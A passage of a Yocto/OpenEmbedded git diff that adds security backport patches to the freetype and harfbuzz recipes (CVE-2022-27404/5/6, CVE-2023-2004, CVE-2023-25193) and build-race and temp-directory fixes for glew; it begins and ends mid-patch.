++ *avalue = ADD_INT( *avalue, delta );
+
+ Exit:
+ return error;
+--
+2.17.1
diff --git a/meta/recipes-graphics/freetype/freetype_2.10.1.bb b/meta/recipes-graphics/freetype/freetype_2.10.1.bb
index 2d444bbf19..6af744b981 100644
--- a/meta/recipes-graphics/freetype/freetype_2.10.1.bb
+++ b/meta/recipes-graphics/freetype/freetype_2.10.1.bb
@@ -15,6 +15,10 @@ LIC_FILES_CHKSUM = "file://docs/LICENSE.TXT;md5=4af6221506f202774ef74f64932878a1
SRC_URI = "${SAVANNAH_NONGNU_MIRROR}/${BPN}/${BP}.tar.xz \
file://use-right-libtool.patch \
file://0001-sfnt-Fix-heap-buffer-overflow-59308.patch \
+ file://CVE-2022-27404.patch \
+ file://CVE-2022-27405.patch \
+ file://CVE-2022-27406.patch \
+ file://CVE-2023-2004.patch \
"
SRC_URI[md5sum] = "bd42e75127f8431923679480efb5ba8f"
SRC_URI[sha256sum] = "16dbfa488a21fe827dc27eaf708f42f7aa3bb997d745d31a19781628c36ba26f"
diff --git a/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch b/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch
new file mode 100644
index 0000000000..7edcfe8de8
--- /dev/null
+++ b/meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch
@@ -0,0 +1,56 @@
+Upstream-Status: Submitted [https://github.com/nigels-com/glew/pull/311]
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 0ce0a85597db48a2fca619bd95e34af091e54ae8 Mon Sep 17 00:00:00 2001
+From: Ross Burton <ross.burton@arm.com>
+Date: Thu, 22 Jul 2021 16:31:11 +0100
+Subject: [PATCH] Fix build race in Makefile
+
+The current rule for the binaries is:
+
+glew.bin: glew.lib bin bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
+
+In parallel builds, all of those targets happen at the same time. This
+means that 'bin' can happen *after* 'bin/$(GLEWINFO.BIN)', which is a
+problem as the 'bin' target's responsibility is to create the directory
+that the other target writes into.
+
+Solve this by not having a separate 'create directory' target which is
+fundamentally racy, and simply mkdir in each target which writes into it.
+---
+ Makefile | 9 ++++-----
+ 1 file changed, 4 insertions(+), 5 deletions(-)
+
+diff --git a/Makefile b/Makefile
+index d0e4614..04af44c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -171,21 +171,20 @@ VISUALINFO.BIN.OBJ := $(VISUALINFO.BIN.OBJ:.c=.o)
+ # Don't build glewinfo or visualinfo for NaCL, yet.
+
+ ifneq ($(filter nacl%,$(SYSTEM)),)
+-glew.bin: glew.lib bin
++glew.bin: glew.lib
+ else
+-glew.bin: glew.lib bin bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
++glew.bin: glew.lib bin/$(GLEWINFO.BIN) bin/$(VISUALINFO.BIN)
+ endif
+
+-bin:
+- mkdir bin
+-
+ bin/$(GLEWINFO.BIN): $(GLEWINFO.BIN.OBJ) $(LIB.SHARED.DIR)/$(LIB.SHARED)
++ @mkdir -p $(dir $@)
+ $(CC) $(CFLAGS) -o $@ $(GLEWINFO.BIN.OBJ) $(BIN.LIBS)
+ ifneq ($(STRIP),)
+ $(STRIP) -x $@
+ endif
+
+ bin/$(VISUALINFO.BIN): $(VISUALINFO.BIN.OBJ) $(LIB.SHARED.DIR)/$(LIB.SHARED)
++ @mkdir -p $(dir $@)
+ $(CC) $(CFLAGS) -o $@ $(VISUALINFO.BIN.OBJ) $(BIN.LIBS)
+ ifneq ($(STRIP),)
+ $(STRIP) -x $@
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/glew/glew/notempdir.patch b/meta/recipes-graphics/glew/glew/notempdir.patch
new file mode 100644
index 0000000000..8d79ce0cdf
--- /dev/null
+++ b/meta/recipes-graphics/glew/glew/notempdir.patch
@@ -0,0 +1,19 @@
+We don't use the dist-* targets and hence DIST_DIR isn't used. The current code
+creates a new temp directory in /tmp/ for every invocation of make. Lets
+not do that.
+
+Upstream-Status: Pending [a revised version would be needed for upstream]
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: glew-2.2.0/Makefile
+===================================================================
+--- glew-2.2.0.orig/Makefile
++++ glew-2.2.0/Makefile
+@@ -56,7 +56,6 @@ DIST_SRC_ZIP ?= $(shell pwd)/$(DIST_NAME
+ DIST_SRC_TGZ ?= $(shell pwd)/$(DIST_NAME).tgz
+ DIST_WIN32 ?= $(shell pwd)/$(DIST_NAME)-win32.zip
+
+-DIST_DIR := $(shell mktemp -d /tmp/glew.XXXXXX)/$(DIST_NAME)
+
+ # To disable stripping of linked binaries either:
+ # - use STRIP= on gmake command-line
diff --git a/meta/recipes-graphics/glew/glew_2.2.0.bb b/meta/recipes-graphics/glew/glew_2.2.0.bb
index 8948444e08..d7a26a3438 100644
--- a/meta/recipes-graphics/glew/glew_2.2.0.bb
+++ b/meta/recipes-graphics/glew/glew_2.2.0.bb
@@ -6,6 +6,8 @@ LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=2ac251558de685c6b9478d89be3149c2"
SRC_URI = "${SOURCEFORGE_MIRROR}/project/glew/glew/${PV}/glew-${PV}.tgz \
+ file://0001-Fix-build-race-in-Makefile.patch \
+ file://notempdir.patch \
file://no-strip.patch"
SRC_URI[md5sum] = "3579164bccaef09e36c0af7f4fd5c7c7"
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch
new file mode 100644
index 0000000000..90d4cfefb4
--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch
@@ -0,0 +1,335 @@
+From 3122c2cdc45a964efedad8953a2df67205c3e3a8 Mon Sep 17 00:00:00 2001
+From: Behdad Esfahbod <behdad@behdad.org>
+Date: Sat, 4 Dec 2021 19:50:33 -0800
+Subject: [PATCH] [buffer] Add HB_GLYPH_FLAG_UNSAFE_TO_CONCAT
+
+Fixes https://github.com/harfbuzz/harfbuzz/issues/1463
+Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/3122c2cdc45a964efedad8953a2df67205c3e3a8]
+Comment1: To backport the fix for CVE-2023-25193, add defination for HB_GLYPH_FLAG_UNSAFE_TO_CONCAT. This patch is needed along with CVE-2023-25193-pre1.patch for sucessfull porting.
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/hb-buffer.cc | 10 ++---
+ src/hb-buffer.h | 76 ++++++++++++++++++++++++++++++------
+ src/hb-buffer.hh | 33 ++++++++++------
+ src/hb-ot-layout-gsubgpos.hh | 39 +++++++++++++++---
+ src/hb-ot-shape.cc | 8 +---
+ 5 files changed, 124 insertions(+), 42 deletions(-)
+
+diff --git a/src/hb-buffer.cc b/src/hb-buffer.cc
+index 6131c86..bba5eae 100644
+--- a/src/hb-buffer.cc
++++ b/src/hb-buffer.cc
+@@ -610,14 +610,14 @@ done:
+ }
+
+ void
+-hb_buffer_t::unsafe_to_break_impl (unsigned int start, unsigned int end)
++hb_buffer_t::unsafe_to_break_impl (unsigned int start, unsigned int end, hb_mask_t mask)
+ {
+ unsigned int cluster = (unsigned int) -1;
+ cluster = _unsafe_to_break_find_min_cluster (info, start, end, cluster);
+- _unsafe_to_break_set_mask (info, start, end, cluster);
++ _unsafe_to_break_set_mask (info, start, end, cluster, mask);
+ }
+ void
+-hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end)
++hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end, hb_mask_t mask)
+ {
+ if (!have_output)
+ {
+@@ -631,8 +631,8 @@ hb_buffer_t::unsafe_to_break_from_outbuffer (unsigned int start, unsigned int en
+ unsigned int cluster = (unsigned int) -1;
+ cluster = _unsafe_to_break_find_min_cluster (out_info, start, out_len, cluster);
+ cluster = _unsafe_to_break_find_min_cluster (info, idx, end, cluster);
+- _unsafe_to_break_set_mask (out_info, start, out_len, cluster);
+- _unsafe_to_break_set_mask (info, idx, end, cluster);
++ _unsafe_to_break_set_mask (out_info, start, out_len, cluster, mask);
++ _unsafe_to_break_set_mask (info, idx, end, cluster, mask);
+ }
+
+ void
+diff --git a/src/hb-buffer.h b/src/hb-buffer.h
+index d5cb746..42dc92a 100644
+--- a/src/hb-buffer.h
++++ b/src/hb-buffer.h
+@@ -77,26 +77,76 @@ typedef struct hb_glyph_info_t
+ * @HB_GLYPH_FLAG_UNSAFE_TO_BREAK: Indicates that if input text is broken at the
+ * beginning of the cluster this glyph is part of,
+ * then both sides need to be re-shaped, as the
+- * result might be different. On the flip side,
+- * it means that when this flag is not present,
+- * then it's safe to break the glyph-run at the
+- * beginning of this cluster, and the two sides
+- * represent the exact same result one would get
+- * if breaking input text at the beginning of
+- * this cluster and shaping the two sides
+- * separately. This can be used to optimize
+- * paragraph layout, by avoiding re-shaping
+- * of each line after line-breaking, or limiting
+- * the reshaping to a small piece around the
+- * breaking point only.
++ * result might be different.
++ *
++ * On the flip side, it means that when this
++ * flag is not present, then it is safe to break
++ * the glyph-run at the beginning of this
++ * cluster, and the two sides will represent the
++ * exact same result one would get if breaking
++ * input text at the beginning of this cluster
++ * and shaping the two sides separately.
++ *
++ * This can be used to optimize paragraph
++ * layout, by avoiding re-shaping of each line
++ * after line-breaking.
++ *
++ * @HB_GLYPH_FLAG_UNSAFE_TO_CONCAT: Indicates that if input text is changed on one
++ * side of the beginning of the cluster this glyph
++ * is part of, then the shaping results for the
++ * other side might change.
++ *
++ * Note that the absence of this flag will NOT by
++ * itself mean that it IS safe to concat text.
++ * Only two pieces of text both of which clear of
++ * this flag can be concatenated safely.
++ *
++ * This can be used to optimize paragraph
++ * layout, by avoiding re-shaping of each line
++ * after line-breaking, by limiting the
++ * reshaping to a small piece around the
++ * breaking positin only, even if the breaking
++ * position carries the
++ * #HB_GLYPH_FLAG_UNSAFE_TO_BREAK or when
++ * hyphenation or other text transformation
++ * happens at line-break position, in the following
++ * way:
++ *
++ * 1. Iterate back from the line-break position till
++ * the the first cluster start position that is
++ * NOT unsafe-to-concat, 2. shape the segment from
++ * there till the end of line, 3. check whether the
++ * resulting glyph-run also is clear of the
++ * unsafe-to-concat at its start-of-text position;
++ * if it is, just splice it into place and the line
++ * is shaped; If not, move on to a position further
++ * back that is clear of unsafe-to-concat and retry
++ * from there, and repeat.
++ *
++ * At the start of next line a similar algorithm can
++ * be implemented. A slight complication will arise,
++ * because while our buffer API has a way to
++ * return flags for position corresponding to
++ * start-of-text, there is currently no position
++ * corresponding to end-of-text. This limitation
++ * can be alleviated by shaping more text than needed
++ * and looking for unsafe-to-concat flag within text
++ * clusters.
++ *
++ * The #HB_GLYPH_FLAG_UNSAFE_TO_BREAK flag will
++ * always imply this flag.
++ *
++ * Since: REPLACEME
++ *
+ * @HB_GLYPH_FLAG_DEFINED: All the currently defined flags.
+ *
+ * Since: 1.5.0
+ */
+ typedef enum { /*< flags >*/
+ HB_GLYPH_FLAG_UNSAFE_TO_BREAK = 0x00000001,
++ HB_GLYPH_FLAG_UNSAFE_TO_CONCAT = 0x00000002,
+
+- HB_GLYPH_FLAG_DEFINED = 0x00000001 /* OR of all defined flags */
++ HB_GLYPH_FLAG_DEFINED = 0x00000003 /* OR of all defined flags */
+ } hb_glyph_flags_t;
+
+ HB_EXTERN hb_glyph_flags_t
+diff --git a/src/hb-buffer.hh b/src/hb-buffer.hh
+index b5596d9..beac7b6 100644
+--- a/src/hb-buffer.hh
++++ b/src/hb-buffer.hh
+@@ -67,8 +67,8 @@ enum hb_buffer_scratch_flags_t {
+ HB_BUFFER_SCRATCH_FLAG_HAS_DEFAULT_IGNORABLES = 0x00000002u,
+ HB_BUFFER_SCRATCH_FLAG_HAS_SPACE_FALLBACK = 0x00000004u,
+ HB_BUFFER_SCRATCH_FLAG_HAS_GPOS_ATTACHMENT = 0x00000008u,
+- HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK = 0x00000010u,
+- HB_BUFFER_SCRATCH_FLAG_HAS_CGJ = 0x00000020u,
++ HB_BUFFER_SCRATCH_FLAG_HAS_CGJ = 0x00000010u,
++ HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS = 0x00000020u,
+
+ /* Reserved for complex shapers' internal use. */
+ HB_BUFFER_SCRATCH_FLAG_COMPLEX0 = 0x01000000u,
+@@ -324,8 +324,19 @@ struct hb_buffer_t
+ return;
+ unsafe_to_break_impl (start, end);
+ }
+- HB_INTERNAL void unsafe_to_break_impl (unsigned int start, unsigned int end);
+- HB_INTERNAL void unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end);
++ void unsafe_to_concat (unsigned int start,
++ unsigned int end)
++ {
++ if (end - start < 2)
++ return;
++ unsafe_to_break_impl (start, end, HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
++ }
++ HB_INTERNAL void unsafe_to_break_impl (unsigned int start, unsigned int end,
++ hb_mask_t mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK | HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
++ HB_INTERNAL void unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end,
++ hb_mask_t mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK | HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
++ void unsafe_to_concat_from_outbuffer (unsigned int start, unsigned int end)
++ { unsafe_to_break_from_outbuffer (start, end, HB_GLYPH_FLAG_UNSAFE_TO_CONCAT); }
+
+
+ /* Internal methods */
+@@ -377,12 +388,7 @@ struct hb_buffer_t
+ set_cluster (hb_glyph_info_t &inf, unsigned int cluster, unsigned int mask = 0)
+ {
+ if (inf.cluster != cluster)
+- {
+- if (mask & HB_GLYPH_FLAG_UNSAFE_TO_BREAK)
+- inf.mask |= HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
+- else
+- inf.mask &= ~HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
+- }
++ inf.mask = (inf.mask & ~HB_GLYPH_FLAG_DEFINED) | (mask & HB_GLYPH_FLAG_DEFINED);
+ inf.cluster = cluster;
+ }
+
+@@ -398,13 +404,14 @@ struct hb_buffer_t
+ void
+ _unsafe_to_break_set_mask (hb_glyph_info_t *infos,
+ unsigned int start, unsigned int end,
+- unsigned int cluster)
++ unsigned int cluster,
++ hb_mask_t mask)
+ {
+ for (unsigned int i = start; i < end; i++)
+ if (cluster != infos[i].cluster)
+ {
+- scratch_flags |= HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK;
+- infos[i].mask |= HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
++ scratch_flags |= HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS;
++ infos[i].mask |= mask;
+ }
+ }
+
+diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
+index 579d178..a6ca456 100644
+--- a/src/hb-ot-layout-gsubgpos.hh
++++ b/src/hb-ot-layout-gsubgpos.hh
+@@ -369,7 +369,7 @@ struct hb_ot_apply_context_t :
+ may_skip (const hb_glyph_info_t &info) const
+ { return matcher.may_skip (c, info); }
+
+- bool next ()
++ bool next (unsigned *unsafe_to = nullptr)
+ {
+ assert (num_items > 0);
+ while (idx + num_items < end)
+@@ -392,11 +392,17 @@ struct hb_ot_apply_context_t :
+ }
+
+ if (skip == matcher_t::SKIP_NO)
++ {
++ if (unsafe_to)
++ *unsafe_to = idx + 1;
+ return false;
++ }
+ }
++ if (unsafe_to)
++ *unsafe_to = end;
+ return false;
+ }
+- bool prev ()
++ bool prev (unsigned *unsafe_from = nullptr)
+ {
+ assert (num_items > 0);
+ while (idx > num_items - 1)
+@@ -419,8 +425,14 @@ struct hb_ot_apply_context_t :
+ }
+
+ if (skip == matcher_t::SKIP_NO)
++ {
++ if (unsafe_from)
++ *unsafe_from = hb_max (1u, idx) - 1u;
+ return false;
++ }
+ }
++ if (unsafe_from)
++ *unsafe_from = 0;
+ return false;
+ }
+
+@@ -834,7 +846,12 @@ static inline bool match_input (hb_ot_apply_context_t *c,
+ match_positions[0] = buffer->idx;
+ for (unsigned int i = 1; i < count; i++)
+ {
+- if (!skippy_iter.next ()) return_trace (false);
++ unsigned unsafe_to;
++ if (!skippy_iter.next (&unsafe_to))
++ {
++ c->buffer->unsafe_to_concat (c->buffer->idx, unsafe_to);
++ return_trace (false);
++ }
+
+ match_positions[i] = skippy_iter.idx;
+
+@@ -1022,8 +1039,14 @@ static inline bool match_backtrack (hb_ot_apply_context_t *c,
+ skippy_iter.set_match_func (match_func, match_data, backtrack);
+
+ for (unsigned int i = 0; i < count; i++)
+- if (!skippy_iter.prev ())
++ {
++ unsigned unsafe_from;
++ if (!skippy_iter.prev (&unsafe_from))
++ {
++ c->buffer->unsafe_to_concat_from_outbuffer (unsafe_from, c->buffer->idx);
+ return_trace (false);
++ }
++ }
+
+ *match_start = skippy_iter.idx;
+
+@@ -1045,8 +1068,14 @@ static inline bool match_lookahead (hb_ot_apply_context_t *c,
+ skippy_iter.set_match_func (match_func, match_data, lookahead);
+
+ for (unsigned int i = 0; i < count; i++)
+- if (!skippy_iter.next ())
++ {
++ unsigned unsafe_to;
++ if (!skippy_iter.next (&unsafe_to))
++ {
++ c->buffer->unsafe_to_concat (c->buffer->idx + offset, unsafe_to);
+ return_trace (false);
++ }
++ }
+
+ *end_index = skippy_iter.idx + 1;
+
+diff --git a/src/hb-ot-shape.cc b/src/hb-ot-shape.cc
+index 5d9a70c..5d10b30 100644
+--- a/src/hb-ot-shape.cc
++++ b/src/hb-ot-shape.cc
+@@ -1008,7 +1008,7 @@ hb_propagate_flags (hb_buffer_t *buffer)
+ /* Propagate cluster-level glyph flags to be the same on all cluster glyphs.
+ * Simplifies using them. */
+
+- if (!(buffer->scratch_flags & HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK))
++ if (!(buffer->scratch_flags & HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS))
+ return;
+
+ hb_glyph_info_t *info = buffer->info;
+@@ -1017,11 +1017,7 @@ hb_propagate_flags (hb_buffer_t *buffer)
+ {
+ unsigned int mask = 0;
+ for (unsigned int i = start; i < end; i++)
+- if (info[i].mask & HB_GLYPH_FLAG_UNSAFE_TO_BREAK)
+- {
+- mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
+- break;
+- }
++ mask |= info[i].mask & HB_GLYPH_FLAG_DEFINED;
+ if (mask)
+ for (unsigned int i = start; i < end; i++)
+ info[i].mask |= mask;
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch
new file mode 100644
index 0000000000..4994e0ef68
--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch
@@ -0,0 +1,135 @@
+From b29fbd16fa82b82bdf0dcb2f13a63f7dc23cf324 Mon Sep 17 00:00:00 2001
+From: Behdad Esfahbod <behdad@behdad.org>
+Date: Mon, 6 Feb 2023 13:08:52 -0700
+Subject: [PATCH] [gsubgpos] Refactor skippy_iter.match()
+
+Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/b29fbd16fa82b82bdf0dcb2f13a63f7dc23cf324]
+Comment1: To backport the fix for CVE-2023-25193, add defination for MATCH, NOT_MATCH and SKIP.
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/hb-ot-layout-gsubgpos.hh | 94 +++++++++++++++++++++---------------
+ 1 file changed, 54 insertions(+), 40 deletions(-)
+
+diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
+index a6ca456..5a7e564 100644
+--- a/src/hb-ot-layout-gsubgpos.hh
++++ b/src/hb-ot-layout-gsubgpos.hh
+@@ -369,33 +369,52 @@ struct hb_ot_apply_context_t :
+ may_skip (const hb_glyph_info_t &info) const
+ { return matcher.may_skip (c, info); }
+
++ enum match_t {
++ MATCH,
++ NOT_MATCH,
++ SKIP
++ };
++
++ match_t match (hb_glyph_info_t &info)
++ {
++ matcher_t::may_skip_t skip = matcher.may_skip (c, info);
++ if (unlikely (skip == matcher_t::SKIP_YES))
++ return SKIP;
++
++ matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
++ if (match == matcher_t::MATCH_YES ||
++ (match == matcher_t::MATCH_MAYBE &&
++ skip == matcher_t::SKIP_NO))
++ return MATCH;
++
++ if (skip == matcher_t::SKIP_NO)
++ return NOT_MATCH;
++
++ return SKIP;
++ }
++
+ bool next (unsigned *unsafe_to = nullptr)
+ {
+ assert (num_items > 0);
+ while (idx + num_items < end)
+ {
+ idx++;
+- const hb_glyph_info_t &info = c->buffer->info[idx];
+-
+- matcher_t::may_skip_t skip = matcher.may_skip (c, info);
+- if (unlikely (skip == matcher_t::SKIP_YES))
+- continue;
+-
+- matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
+- if (match == matcher_t::MATCH_YES ||
+- (match == matcher_t::MATCH_MAYBE &&
+- skip == matcher_t::SKIP_NO))
+- {
+- num_items--;
+- if (match_glyph_data) match_glyph_data++;
+- return true;
+- }
+-
+- if (skip == matcher_t::SKIP_NO)
++ switch (match (c->buffer->info[idx]))
+ {
+- if (unsafe_to)
+- *unsafe_to = idx + 1;
+- return false;
++ case MATCH:
++ {
++ num_items--;
++ if (match_glyph_data) match_glyph_data++;
++ return true;
++ }
++ case NOT_MATCH:
++ {
++ if (unsafe_to)
++ *unsafe_to = idx + 1;
++ return false;
++ }
++ case SKIP:
++ continue;
+ }
+ }
+ if (unsafe_to)
+@@ -408,27 +427,22 @@ struct hb_ot_apply_context_t :
+ while (idx > num_items - 1)
+ {
+ idx--;
+- const hb_glyph_info_t &info = c->buffer->out_info[idx];
+-
+- matcher_t::may_skip_t skip = matcher.may_skip (c, info);
+- if (unlikely (skip == matcher_t::SKIP_YES))
+- continue;
+-
+- matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
+- if (match == matcher_t::MATCH_YES ||
+- (match == matcher_t::MATCH_MAYBE &&
+- skip == matcher_t::SKIP_NO))
++ switch (match (c->buffer->out_info[idx]))
+ {
+- num_items--;
+- if (match_glyph_data) match_glyph_data++;
+- return true;
+- }
+-
+- if (skip == matcher_t::SKIP_NO)
+- {
+- if (unsafe_from)
+- *unsafe_from = hb_max (1u, idx) - 1u;
+- return false;
++ case MATCH:
++ {
++ num_items--;
++ if (match_glyph_data) match_glyph_data++;
++ return true;
++ }
++ case NOT_MATCH:
++ {
++ if (unsafe_from)
++ *unsafe_from = hb_max (1u, idx) - 1u;
++ return false;
++ }
++ case SKIP:
++ continue;
+ }
+ }
+ if (unsafe_from)
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch
new file mode 100644
index 0000000000..e4ac13dbad
--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch
@@ -0,0 +1,179 @@
+From 9c8e972dbecda93546038d24444d8216397d75a3 Mon Sep 17 00:00:00 2001
+From: Behdad Esfahbod <behdad@behdad.org>
+Date: Mon, 6 Feb 2023 14:51:25 -0700
+Subject: [PATCH] [GPOS] Avoid O(n^2) behavior in mark-attachment
+
+Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/8708b9e081192786c027bb7f5f23d76dbe5c19e8]
+Comment1: The Original Patch [https://github.com/harfbuzz/harfbuzz/commit/85be877925ddbf34f74a1229f3ca1716bb6170dc] causes regression and was reverted. This Patch completes the fix.
+Comment2: The Patch contained files MarkBasePosFormat1.hh and MarkLigPosFormat1.hh which were moved from hb-ot-layout-gpos-table.hh as per https://github.com/harfbuzz/harfbuzz/commit/197d9a5c994eb41c8c89b7b958b26b1eacfeeb00
+CVE: CVE-2023-25193
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+
+---
+ src/hb-ot-layout-gpos-table.hh | 103 +++++++++++++++++++++++----------
+ src/hb-ot-layout-gsubgpos.hh | 5 +-
+ 2 files changed, 78 insertions(+), 30 deletions(-)
+
+diff --git a/src/hb-ot-layout-gpos-table.hh b/src/hb-ot-layout-gpos-table.hh
+index 024312d..db5f9ae 100644
+--- a/src/hb-ot-layout-gpos-table.hh
++++ b/src/hb-ot-layout-gpos-table.hh
+@@ -1458,6 +1458,25 @@ struct MarkBasePosFormat1
+
+ const Coverage &get_coverage () const { return this+markCoverage; }
+
++ static inline bool accept (hb_buffer_t *buffer, unsigned idx)
++ {
++ /* We only want to attach to the first of a MultipleSubst sequence.
++ * https://github.com/harfbuzz/harfbuzz/issues/740
++ * Reject others...
++ * ...but stop if we find a mark in the MultipleSubst sequence:
++ * https://github.com/harfbuzz/harfbuzz/issues/1020 */
++ return !_hb_glyph_info_multiplied (&buffer->info[idx]) ||
++ 0 == _hb_glyph_info_get_lig_comp (&buffer->info[idx]) ||
++ (idx == 0 ||
++ _hb_glyph_info_is_mark (&buffer->info[idx - 1]) ||
++ !_hb_glyph_info_multiplied (&buffer->info[idx - 1]) ||
++ _hb_glyph_info_get_lig_id (&buffer->info[idx]) !=
++ _hb_glyph_info_get_lig_id (&buffer->info[idx - 1]) ||
++ _hb_glyph_info_get_lig_comp (&buffer->info[idx]) !=
++ _hb_glyph_info_get_lig_comp (&buffer->info[idx - 1]) + 1
++ );
++ }
++
+ bool apply (hb_ot_apply_context_t *c) const
+ {
+ TRACE_APPLY (this);
+@@ -1465,37 +1484,46 @@ struct MarkBasePosFormat1
+ unsigned int mark_index = (this+markCoverage).get_coverage (buffer->cur().codepoint);
+ if (likely (mark_index == NOT_COVERED)) return_trace (false);
+
+- /* Now we search backwards for a non-mark glyph */
++ /* Now we search backwards for a non-mark glyph.
++ * We don't use skippy_iter.prev() to avoid O(n^2) behavior. */
++
+ hb_ot_apply_context_t::skipping_iterator_t &skippy_iter = c->iter_input;
+- skippy_iter.reset (buffer->idx, 1);
+ skippy_iter.set_lookup_props (LookupFlag::IgnoreMarks);
+- do {
+- if (!skippy_iter.prev ()) return_trace (false);
+- /* We only want to attach to the first of a MultipleSubst sequence.
+- * https://github.com/harfbuzz/harfbuzz/issues/740
+- * Reject others...
+- * ...but stop if we find a mark in the MultipleSubst sequence:
+- * https://github.com/harfbuzz/harfbuzz/issues/1020 */
+- if (!_hb_glyph_info_multiplied (&buffer->info[skippy_iter.idx]) ||
+- 0 == _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx]) ||
+- (skippy_iter.idx == 0 ||
+- _hb_glyph_info_is_mark (&buffer->info[skippy_iter.idx - 1]) ||
+- _hb_glyph_info_get_lig_id (&buffer->info[skippy_iter.idx]) !=
+- _hb_glyph_info_get_lig_id (&buffer->info[skippy_iter.idx - 1]) ||
+- _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx]) !=
+- _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx - 1]) + 1
+- ))
+- break;
+- skippy_iter.reject ();
+- } while (true);
++ unsigned j;
++ for (j = buffer->idx; j > c->last_base_until; j--)
++ {
++ auto match = skippy_iter.match (buffer->info[j - 1]);
++ if (match == skippy_iter.MATCH)
++ {
++ if (!accept (buffer, j - 1))
++ match = skippy_iter.SKIP;
++ }
++ if (match == skippy_iter.MATCH)
++ {
++ c->last_base = (signed) j - 1;
++ break;
++ }
++ }
++ c->last_base_until = buffer->idx;
++ if (c->last_base == -1)
++ {
++ buffer->unsafe_to_concat_from_outbuffer (0, buffer->idx + 1);
++ return_trace (false);
++ }
++
++ unsigned idx = (unsigned) c->last_base;
+
+ /* Checking that matched glyph is actually a base glyph by GDEF is too strong; disabled */
+- //if (!_hb_glyph_info_is_base_glyph (&buffer->info[skippy_iter.idx])) { return_trace (false); }
++ //if (!_hb_glyph_info_is_base_glyph (&buffer->info[idx])) { return_trace (false); }
+
+- unsigned int base_index = (this+baseCoverage).get_coverage (buffer->info[skippy_iter.idx].codepoint);
+- if (base_index == NOT_COVERED) return_trace (false);
++ unsigned int base_index = (this+baseCoverage).get_coverage (buffer->info[idx].codepoint);
++ if (base_index == NOT_COVERED)
++ {
++ buffer->unsafe_to_concat_from_outbuffer (idx, buffer->idx + 1);
++ return_trace (false);
++ }
+
+- return_trace ((this+markArray).apply (c, mark_index, base_index, this+baseArray, classCount, skippy_iter.idx));
++ return_trace ((this+markArray).apply (c, mark_index, base_index, this+baseArray, classCount, idx));
+ }
+
+ bool subset (hb_subset_context_t *c) const
+@@ -1587,15 +1615,32 @@ struct MarkLigPosFormat1
+ if (likely (mark_index == NOT_COVERED)) return_trace (false);
+
+ /* Now we search backwards for a non-mark glyph */
++
+ hb_ot_apply_context_t::skipping_iterator_t &skippy_iter = c->iter_input;
+- skippy_iter.reset (buffer->idx, 1);
+ skippy_iter.set_lookup_props (LookupFlag::IgnoreMarks);
+- if (!skippy_iter.prev ()) return_trace (false);
++
++ unsigned j;
++ for (j = buffer->idx; j > c->last_base_until; j--)
++ {
++ auto match = skippy_iter.match (buffer->info[j - 1]);
++ if (match == skippy_iter.MATCH)
++ {
++ c->last_base = (signed) j - 1;
++ break;
++ }
++ }
++ c->last_base_until = buffer->idx;
++ if (c->last_base == -1)
++ {
++ buffer->unsafe_to_concat_from_outbuffer (0, buffer->idx + 1);
++ return_trace (false);
++ }
++
++ j = (unsigned) c->last_base;
+
